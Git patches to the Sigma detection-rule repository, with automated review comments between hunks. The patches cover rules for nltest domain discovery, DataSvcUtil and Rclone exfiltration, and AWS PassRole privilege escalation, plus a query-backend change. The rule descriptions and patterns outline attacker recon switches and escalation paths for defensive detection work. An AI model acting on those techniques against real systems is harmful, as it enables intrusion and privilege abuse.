@@ -18,11 +18,12 @@ logsource: detection: selection: EventID: 4689 - Image|contains: "nltest.exe" - ExitStatus: "0x0" + ProcessName|endswith: nltest.exe + Status: "0x0" condition: selection fields: - "SubjectUserName" + - "SubjectDomainName" falsepositives: - "Red team activity" level: high From e6b32b90af35f79be188920a175981b083aaee08 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 2 Oct 2021 07:25:11 +0200 Subject: [PATCH 1157/1367] Update win_lolbas_execution_of_nltest.exe --- .../process_creation/win_lolbas_execution_of_nltest.exe | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe index e36bff3e..24a70d34 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe @@ -1,5 +1,5 @@ -title: windows lolbas execution of nltest.exe -id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 # https://www.uuidgenerator.net/version4 +title: Correct Execution of Nltest.exe +id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 status: experimental author: Arun Chauhan date: 2021/08/24 @@ -25,5 +25,6 @@ fields: - "SubjectUserName" - "SubjectDomainName" falsepositives: - - "Red team activity" + - Red team activity + - rare legitimate use by an administrator level: high From f652745924a6fb75b64779885f13f2ec940a3c13 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 2 Oct 2021 07:53:19 +0200 Subject: [PATCH 1158/1367] Update and rename win_lolbas_execution_of_nltest.exe to win_lolbas_execution_of_nltest.yml --- ...ecution_of_nltest.exe => win_lolbas_execution_of_nltest.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{win_lolbas_execution_of_nltest.exe => win_lolbas_execution_of_nltest.yml} (93%) 
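Review bot: `ProcessName|endswith: nltest.exe` has no path separator, so it also matches any executable whose file name merely ends in that string; the other rules on this page anchor on the separator (e.g. `Image|endswith: '\regsvr32.exe'`), so this should be `ProcessName|endswith: '\nltest.exe'`. Event ID 4689 is the process-termination event and carries no command line, so the rule cannot tell the discovery switches the rule's tag comments mention (`/domain_trusts`, `/dclist`, `/parentdomain`) from any other invocation; that limitation belongs in the description. The rule file continues outside the hunk.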
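Review bot: The new title "Correct Execution of Nltest.exe" is ambiguous; given that the selection keys on `Status: "0x0"`, what it means is a successful (zero exit status) run, and the title should say so, e.g. `title: Successful Execution of Nltest.exe`. The falsepositives rewording is fine.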
diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml similarity index 93% rename from rules/windows/process_creation/win_lolbas_execution_of_nltest.exe rename to rules/windows/process_creation/win_lolbas_execution_of_nltest.yml index 24a70d34..f95ad5b8 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml @@ -11,7 +11,7 @@ tags: - attack.discovery - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc - - attack.1016 # enumerate the parent domain of a local machine using /parentdomain + - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain logsource: product: windows service: security From c2a26923c66cda9c3995e2e87ace259e11a31da7 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sat, 2 Oct 2021 09:59:37 +0200 Subject: [PATCH 1159/1367] Update lnx_auditd_clipboard_image_collection.yml --- rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml index 67906351..181bf652 100644 --- a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml +++ b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -21,7 +21,7 @@ detection: - clipboard - clip a3: '-t' - a4: 'image/png' + a4|startswith: 'image/' a5: '-o' condition: xclip tags: From 81d1bb0e2b73465717e74a5685da594043f1a0e0 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sat, 2 Oct 2021 13:32:20 -0500 Subject: [PATCH 1160/1367] Update process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml --- ...creation_lolbas_data_exfiltration_by_using_datasvcutil.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml index 71febbac..ea11ff85 100644 --- a/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml +++ b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml @@ -18,8 +18,8 @@ logsource: detection: selection: CommandLine|contains|all: - - '/in:*' - - '/out:*' + - '/in:' + - '/out:' Image|endswith: - '\DataSvcUtil.exe' condition: selection From 62025971c79d365e307487fb57108e084c0dd0fb Mon Sep 17 00:00:00 2001 From: albchen Date: Sun, 3 Oct 2021 17:37:05 -0700 Subject: [PATCH 1161/1367] Add generateAggregation Adds aggregation function for rules such as win_multiple_suspicious_cli.yml or win_dnscat2_powershell_implementation.yml. Modeled after splunk.py backend, converted to use MDE's count() and dcount() instead of Splunk's count() and dc(). Requires a valid config for converting aggfields and groupfields. --- tools/sigma/backends/mdatp.py | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/tools/sigma/backends/mdatp.py b/tools/sigma/backends/mdatp.py index 0becb7a6..465ddfb2 100644 --- a/tools/sigma/backends/mdatp.py +++ b/tools/sigma/backends/mdatp.py @@ -15,6 +15,7 @@ # along with this program. If not, see . import re +import sigma from functools import wraps from .base import SingleTextQueryBackend from .exceptions import NotSupportedError 
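Review bot: `import sigma` binds only the top-level package; the attribute chain `sigma.parser.condition` used by the new `generateAggregation` in the next hunk exists only if some other module has already imported `sigma.parser.condition`, so the lookup can raise `AttributeError` depending on import order. The explicit form is safer and matches the file's existing direct imports: `from sigma.parser.condition import SigmaAggregationParser`, with `SigmaAggregationParser.AGGFUNC_NEAR` at the use site. This module sits inside the package itself (`from .base import ...`), so the absolute import of the enclosing package is also worth a comment if it is kept.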
@@ -416,3 +417,23 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): return self.generateMapItemTypedNode(mapping[0], value) return super().generateMapItemNode(node) + + def generateAggregation(self, agg): + if agg == None: + return "" + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: + raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + if agg.groupfield == None: + if agg.aggfunc_notrans == 'count': + if agg.aggfield == None : + return " | summarize val=count() | where val %s %s" % (agg.cond_op, agg.condition) + else: + agg.aggfunc_notrans = 'dcount' + return " | summarize val=%s(%s) as val | where val %s %s" % (agg.aggfunc_notrans, agg.aggfield or "", agg.cond_op, agg.condition) + else: + if agg.aggfunc_notrans == 'count': + if agg.aggfield == None : + return " | summarize val=count() by %s | where val %s %s" % (agg.groupfield, agg.cond_op, agg.condition) + else: + agg.aggfunc_notrans = 'dcount' + return " | summarize val=%s(%s) by %s | where val %s %s" % (agg.aggfunc_notrans, agg.aggfield or "", agg.groupfield or "", agg.cond_op, agg.condition) From 92b1ce4cf428d756b16c3159b21f645fd196a5df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 3 Oct 2021 22:54:01 -0500 Subject: [PATCH 1162/1367] Create pass_role_to_lambda_function.yml --- .../aws/pass_role_to_lambda_function.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/aws/pass_role_to_lambda_function.yml diff --git a/rules/cloud/aws/pass_role_to_lambda_function.yml b/rules/cloud/aws/pass_role_to_lambda_function.yml new file mode 100644 index 00000000..013ca204 --- /dev/null +++ b/rules/cloud/aws/pass_role_to_lambda_function.yml 
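Review bot: In the no-`groupfield` branch, the non-count path emits `summarize val=%s(%s) as val`; `val=` already names the result column in KQL and a trailing `as val` is not summarize syntax, so the generated query will not parse, while the grouped branch below is written correctly. The line should be `return " | summarize val=%s(%s) | where val %s %s" % (agg.aggfunc_notrans, agg.aggfield or "", agg.cond_op, agg.condition)`. The method also rewrites `agg.aggfunc_notrans = 'dcount'` on the parser object, so a second backend or a repeat call over the same `agg` sees `dcount` where the rule said `count`; a local variable avoids the side effect. The `== None` comparisons should be `is None`, and `NotSupportedError` (already imported) is probably the intended exception for the `near` case rather than `NotImplementedError`.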
@@ -0,0 +1,28 @@ +title: AWS Passed Role to Lambda Function +id: d914951b-52c8-485f-875e-86abab710c0b +description: Detects when an user with these permissions could escalate privileges by passing an existing IAM role to a new Lmbda function that includes code to import the AWS library to their programming lanugage. This can give access to the privileges associated with any Lambda service role that exists in the account and escalate to full administrator access to the account. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/03 +references: + - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ +logsource: + service: cloudtrail +detection: + selection1: + eventSource: iam.amazonaws.com + eventName: PassRole + selection2: + eventSource: lambda.amazonaws.com + eventName: CreateFunction + selection3: + eventSource: lambda.amazonaws.com + eventName: InvokeFunction + condition: all +level: low +tags: + - attack.privilege_escalation + - attack.t1078 +falsepositives: + - Passed Role to New Lambda Function may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - If known behavior is causing false positives, it can be exempted from the rule. From 60eccf711de6b2556deb1569a16f8b1128c02641 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 3 Oct 2021 22:54:19 -0500 Subject: [PATCH 1163/1367] Rename pass_role_to_lambda_function.yml to aws_pass_role_to_lambda_function.yml --- ...o_lambda_function.yml => aws_pass_role_to_lambda_function.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/aws/{pass_role_to_lambda_function.yml => aws_pass_role_to_lambda_function.yml} (100%) 
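Review bot: `condition: all` requires the three selections to match the same event, but each pins a different `eventName` (`PassRole`, `CreateFunction`, `InvokeFunction`), so no single CloudTrail record can satisfy them and the rule can never fire; Sigma also expects `all of them` or `all of selection*`, not a bare `all`. The chain the description walks through spans several records and needs correlation that a plain condition cannot express, so the rule should either be narrowed to the single event that carries the signal (`CreateFunction`, with the role in the request parameters) or be marked as requiring correlation in the description. The same `condition: all` pattern appears in the Glue rule added in a later hunk (passed_role_to_glue_development_endpoint.yml). As far as I know CloudTrail does not record `PassRole` as an event of its own; it is a permission evaluated inside the CreateFunction call, so `selection1` is unlikely to match anything. The description also has typos (`Lmbda`, `lanugage`).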
diff --git a/rules/cloud/aws/pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml similarity index 100% rename from rules/cloud/aws/pass_role_to_lambda_function.yml rename to rules/cloud/aws/aws_pass_role_to_lambda_function.yml From d694d6faa83e6530c0c22546794c5e35c991537b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 3 Oct 2021 23:03:39 -0500 Subject: [PATCH 1164/1367] Create passed_role_to_glue_development_endpoint.yml --- ...ssed_role_to_glue_development_endpoint.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/aws/passed_role_to_glue_development_endpoint.yml diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml new file mode 100644 index 00000000..ff46be0a --- /dev/null +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml 
@@ -0,0 +1,25 @@ +title: AWS Passed Role to Glue Development Endpoint +id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 +description: Detects when an user these permissions could create a new AWS Glue development endpoint and pass an existing service role to it. They then could SSH into the instance and use the AWS CLI to have access of the permissions the role has access to. The adversary could gain privileges associated with any Glue service role that exists in the account, which could range from no privilege escalation to full administrator access to the account. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/03 +references: + - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ + - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html +logsource: + service: cloudtrail +detection: + selection1: + eventSource: lambda.amazonaws.com + eventName: PassRole + selection2: + eventSource: glue.amazonaws.com + eventName: CreateDevEndpoint + condition: all +level: low +tags: + - attack.privilege_escalation +falsepositives: + - Passed Role to Glue Development Endpoint may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - If known behavior is causing false positives, it can be exempted from the rule. From 96f05f7f191c646460ae2abacf28d13eca619d8f Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Mon, 4 Oct 2021 15:25:55 +0200 Subject: [PATCH 1165/1367] Update azure_ad_user_added_to_sensitive_role.yml --- .../azure_ad_user_added_to_sensitive_role.yml | 24 ++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml index 9daeafb9..47743d9e 100644 --- a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml 
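Review bot: `selection1` pairs `eventSource: lambda.amazonaws.com` with `eventName: PassRole`, which looks copied from the Lambda rule: nothing about a Glue development endpoint involves the Lambda service, and the Lambda rule itself attributes `PassRole` to `iam.amazonaws.com`, so the two rules disagree on the same event. Whichever source is right, it should be the same in both files; if `selection1` is kept, `eventSource: iam.amazonaws.com` is the consistent choice. `tags` lists only the tactic here while the sibling rule also carries a technique; the two should match.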
+++ b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml @@ -1 +1,23 @@ -test +title: User added to an administrator's Azure AD role +id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 +description: Detect when an user is added to an administrator's Azure AD role +author: Raphaël CALVET, @MetallicHack +date: 2021/10/04 +references: + - https://attack.mitre.org/techniques/T1098/003/ + - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ +logsource: + service: azure.activitylogs +detection: + selection: + Operation: 'Add member to role.' + Workload: 'AzureActiveDirectory' + ModifiedProperties{}.NewValue|endswith: + - 'Admins' + - 'Administrator' + condition: selection +falsepositives: + - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. +level: medium +status: experimental +tags: persistence From fe439e1998dd1b42ef6ee748801b110992b9b5c9 Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Mon, 4 Oct 2021 15:26:58 +0200 Subject: [PATCH 1166/1367] Rename azure_ad_user_added_to_sensitive_role.yml to azure_ad_user_added_to_admin_role.yml --- ...o_sensitive_role.yml => azure_ad_user_added_to_admin_role.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/azure/{azure_ad_user_added_to_sensitive_role.yml => azure_ad_user_added_to_admin_role.yml} (100%) diff --git a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml similarity index 100% rename from rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml rename to rules/cloud/azure/azure_ad_user_added_to_admin_role.yml From 759a715198b726ded11c84e85ce7b44a94a30f00 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 4 Oct 2021 20:34:45 +0200 Subject: [PATCH 1167/1367] Add logsource to duplicate logic test --- tests/test_rules.py | 2 ++ 1 file changed, 2 insertions(+) 
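Review bot: The selection uses `Operation`, `Workload: 'AzureActiveDirectory'` and `ModifiedProperties{}.NewValue`, which is the field schema of the Microsoft 365 unified audit log, whereas `logsource: service: azure.activitylogs` denotes the Azure Activity Log, whose records do not carry these fields; unless the author's backend maps them, the rule will be compiled against the wrong source. Either point the logsource at the feed the fields come from, or record the dependency in the rule, e.g. `# fields follow the O365 unified audit log schema (Workload/Operation/ModifiedProperties)`. Matching `endswith: 'Administrator'` / `'Admins'` keys on role display names, which are localizable and have been renamed over time; the role template id would be more stable if the event exposes it.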
diff --git a/tests/test_rules.py b/tests/test_rules.py index 370e944b..3354ba87 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -219,6 +219,8 @@ class TestRules(unittest.TestCase): for file in self.yield_next_rule_file_path(self.path_to_rules): detection = self.get_rule_part(file_path = file, part_name = "detection") + logsource = self.get_rule_part(file_path = file, part_name = "logsource") + detection.update(logsource) yaml = self.get_rule_yaml(file_path = file) is_multipart_yaml_file = len(yaml) != 1 From fd329f4f9b3fa0aa19f974051cf02852e168587d Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 4 Oct 2021 21:25:57 +0200 Subject: [PATCH 1168/1367] Remove unneeded EventID --- rules/windows/file_event/win_rclone_exec_file.yml | 3 +-- .../windows/image_load/image_load_silenttrinity_stage_use.yml | 3 +-- .../network_connection/sysmon_regsvr32_network_activity.yml | 1 - 3 files changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/windows/file_event/win_rclone_exec_file.yml b/rules/windows/file_event/win_rclone_exec_file.yml index fa47e324..d4323607 100644 --- a/rules/windows/file_event/win_rclone_exec_file.yml +++ b/rules/windows/file_event/win_rclone_exec_file.yml @@ -3,7 +3,7 @@ id: 34986307-b7f4-49be-92f3-e7a4d01ac5db description: Detects Rclone config file being created status: experimental date: 2021/05/26 -modified: 2021/06/27 +modified: 2021/10/04 author: Aaron Greetham (@beardofbinary) - NCC Group references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ @@ -18,7 +18,6 @@ logsource: category: file_event detection: file_selection: - EventID: 11 TargetFilename|contains|all: - ':\Users\' - '\.config\rclone\' diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml index fd1358b0..806fee1f 100644 --- a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml 
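Review bot: `detection.update(logsource)` merges the logsource keys (`category`, `product`, `service`) straight into the detection dict, so a rule whose detection defines a selection with one of those names has it silently overwritten, and if `get_rule_part` returns `None` for a rule lacking a `logsource` section the call raises `TypeError` instead of reporting the rule. Keeping the part under its own key avoids both: `detection["logsource"] = logsource or {}` (or a key that cannot collide with a selection name). The enclosing loop and test method start outside the hunk, so I cannot see what `get_rule_part` returns for a missing part; worth confirming.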
+++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -9,7 +9,7 @@ references: - https://github.com/byt3bl33d3r/SILENTTRINITY author: Aleksey Potapov, oscd.community date: 2019/10/22 -modified: 2021/09/19 +modified: 2021/10/04 tags: - attack.command_and_control logsource: @@ -17,7 +17,6 @@ logsource: product: windows detection: selection: - EventID: 11 # to pass the test otherwise block as same detection that 75c505b1-711d-4f68-a357-8c3fe37dbf2d Description|contains: 'st2stager' condition: selection falsepositives: diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml index 4fed79c6..ade7b307 100644 --- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml +++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -21,7 +21,6 @@ logsource: product: windows detection: selection: - EventID: 3 # need to pass the test "There are rule files with exactly the same detection logic" Image|endswith: '\regsvr32.exe' condition: selection fields: From 654b5b4bff0717d82ab2fc7a09e764a8ab7496f6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 4 Oct 2021 22:08:47 +0200 Subject: [PATCH 1169/1367] Update win_lolbas_execution_of_nltest.yml --- .../windows/process_creation/win_lolbas_execution_of_nltest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml index f95ad5b8..041d524b 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml 
@@ -2,7 +2,7 @@ title: Correct Execution of Nltest.exe id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 status: experimental author: Arun Chauhan -date: 2021/08/24 +date: 2021/10/04 description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm From 4f86a245f82dcee4256d1545a905fe1d53e0bc17 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 5 Oct 2021 07:30:43 +0200 Subject: [PATCH 1170/1367] Order file i correct directory --- .../win_lolbas_execution_of_nltest.yml | 0 ...nt_executable_and_script_creation_by_office_using_file_ext.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{process_creation => builtin}/win_lolbas_execution_of_nltest.yml (100%) rename rules/windows/{process_creation => file_event}/file_event_executable_and_script_creation_by_office_using_file_ext.yml (100%) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml b/rules/windows/builtin/win_lolbas_execution_of_nltest.yml similarity index 100% rename from rules/windows/process_creation/win_lolbas_execution_of_nltest.yml rename to rules/windows/builtin/win_lolbas_execution_of_nltest.yml diff --git a/rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml b/rules/windows/file_event/file_event_executable_and_script_creation_by_office_using_file_ext.yml similarity index 100% rename from rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml rename to rules/windows/file_event/file_event_executable_and_script_creation_by_office_using_file_ext.yml From 80d09483d96a374091e6f8a4d4312b55696a0ab6 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Tue, 5 Oct 2021 07:33:50 +0200 Subject: [PATCH 1171/1367] move to builtin --- .../win_susp_multiple_files_renamed_or_deleted.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{file_event => builtin}/win_susp_multiple_files_renamed_or_deleted.yml (100%) diff --git a/rules/windows/file_event/win_susp_multiple_files_renamed_or_deleted.yml b/rules/windows/builtin/win_susp_multiple_files_renamed_or_deleted.yml similarity index 100% rename from rules/windows/file_event/win_susp_multiple_files_renamed_or_deleted.yml rename to rules/windows/builtin/win_susp_multiple_files_renamed_or_deleted.yml From 3b014259369fa07eaf301e770baa2131174c0822 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 5 Oct 2021 07:40:42 +0200 Subject: [PATCH 1172/1367] Update aws_pass_role_to_lambda_function.yml --- rules/cloud/aws/aws_pass_role_to_lambda_function.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml index 013ca204..333b6596 100644 --- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml +++ b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml @@ -1,5 +1,5 @@ title: AWS Passed Role to Lambda Function -id: d914951b-52c8-485f-875e-86abab710c0b +id: d914951b-52c8-485f-875e-86abab710c0b description: Detects when an user with these permissions could escalate privileges by passing an existing IAM role to a new Lmbda function that includes code to import the AWS library to their programming lanugage. This can give access to the privileges associated with any Lambda service role that exists in the account and escalate to full administrator access to the account. author: Austin Songer @austinsonger status: experimental From ad9362e043131ca57ec780171d05ea02e90f8f13 Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 5 Oct 2021 07:41:41 +0200 Subject: [PATCH 1173/1367] Update passed_role_to_glue_development_endpoint.yml --- rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index ff46be0a..b57a5500 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -1,5 +1,5 @@ title: AWS Passed Role to Glue Development Endpoint -id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 +id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 description: Detects when an user these permissions could create a new AWS Glue development endpoint and pass an existing service role to it. They then could SSH into the instance and use the AWS CLI to have access of the permissions the role has access to. The adversary could gain privileges associated with any Glue service role that exists in the account, which could range from no privilege escalation to full administrator access to the account. author: Austin Songer @austinsonger status: experimental @@ -13,7 +13,7 @@ detection: selection1: eventSource: lambda.amazonaws.com eventName: PassRole - selection2: + selection2: eventSource: glue.amazonaws.com eventName: CreateDevEndpoint condition: all From a4100e76b9f1cec722758925169ac9754a720963 Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Tue, 5 Oct 2021 09:39:03 +0200 Subject: [PATCH 1174/1367] change title and tags in order to match sigmarules --- rules/cloud/azure/azure_ad_user_added_to_admin_role.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml index 47743d9e..6d2a27b0 100644 
--- a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml +++ b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml @@ -1,4 +1,4 @@ -title: User added to an administrator's Azure AD role +title: User Added to an Administrator's Azure AD Role id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 description: Detect when an user is added to an administrator's Azure AD role author: Raphaël CALVET, @MetallicHack @@ -20,4 +20,6 @@ falsepositives: - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. level: medium status: experimental -tags: persistence +tags: + - attack.persistence + - attack.t1098.003 From 030fc2a03ef94923f2cce869669cb67b4f4df93d Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Tue, 5 Oct 2021 09:40:25 +0200 Subject: [PATCH 1175/1367] change title and tags in order to match sigmarules --- rules/cloud/azure/azure_ad_user_added_to_admin_role.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml index 6d2a27b0..ce6c956b 100644 --- a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml +++ b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml @@ -1,6 +1,6 @@ title: User Added to an Administrator's Azure AD Role id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 -description: Detect when an user is added to an administrator's Azure AD role +description: User Added to an Administrator's Azure AD Role author: Raphaël CALVET, @MetallicHack date: 2021/10/04 references: From 4ae3ece31413db6dd6b863b4f21924990d59e84f Mon Sep 17 00:00:00 2001 
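Review bot: The new `description` is now identical to the title, so the rule loses the one sentence that said what it detects; the previous wording only needed its article fixed, e.g. `description: Detects when a user is added to an administrator's Azure AD role`.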
From: Rachel Rice Date: Tue, 5 Oct 2021 14:08:40 +0100 Subject: [PATCH 1176/1367] Update AWS SAML and Lambda rules Use correct case for `AssumeRoleWithSAML` event name. `UpdateFunctionConfiguration`, `UpdateFunctionConfiguration20150331` and `UpdateFunctionConfiguration20150331v2` are all valid event names for updating Lambda function configuration, added selection condition for any of these. --- rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 7 ++++++- rules/cloud/aws/aws_suspicious_saml_activity.yml | 2 +- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml index 7c97e8d2..09789d35 100644 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -11,8 +11,13 @@ logsource: detection: selection: eventSource: lambda.amazonaws.com + filter1: eventName: UpdateFunctionConfiguration - condition: selection + filter2: + eventName: UpdateFunctionConfiguration20150331 + filter3: + eventName: UpdateFunctionConfiguration20150331v2 + condition: selection and (filter1 or filter2 or filter3) level: medium tags: - attack.privilege_escalation diff --git a/rules/cloud/aws/aws_suspicious_saml_activity.yml b/rules/cloud/aws/aws_suspicious_saml_activity.yml index 0b27875a..f8b542be 100644 --- a/rules/cloud/aws/aws_suspicious_saml_activity.yml +++ b/rules/cloud/aws/aws_suspicious_saml_activity.yml @@ -12,7 +12,7 @@ logsource: detection: selection1: eventSource: sts.amazonaws.com - eventName: Assumerolewithsaml + eventName: AssumeRoleWithSAML selection2: eventSource: iam.amazonaws.com eventName: UpdateSAMLProvider From 482df0a0add5a2d7f77b6919aec09292f98652ef Mon Sep 17 00:00:00 2001 
